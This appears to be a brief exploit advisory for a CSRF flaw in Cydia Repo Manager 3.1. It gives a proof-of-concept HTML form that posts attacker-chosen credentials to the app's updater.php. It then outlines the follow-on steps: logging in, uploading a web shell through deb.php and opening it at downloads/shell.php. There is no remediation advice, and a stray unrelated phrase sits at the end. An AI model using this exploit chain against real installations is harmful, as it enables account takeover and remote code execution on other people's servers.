# Cydia Repo Manager CSRF Vulnerability # By cr4wl3r http://bastardlabs.info # http://bastardlabs.info/exploits/Cydia_Repo_Manager.txt # Software Link: http://damarist.de/?lang=en # Download : http://damar1st.de/downloads/CydiaRepoManager3.1.zip # Tested: Win 7 Proof of concept: <form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php"> <input type="text" name="user" value="Username"/> <br /> <input type="text" name="pass" value="Password"/><br /> <input type="submit" name="s" value="w00tw00t!" /> </form> Login :http://bastardlabs/[CydiaRepoManager_path]/index.php Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php Demo : http://bastardlabs.info/demo/CydiaRepoManager1.png http://bastardlabs.info/demo/CydiaRepoManager2.png http://bastardlabs.info/demo/CydiaRepoManager3.png
体验盒子
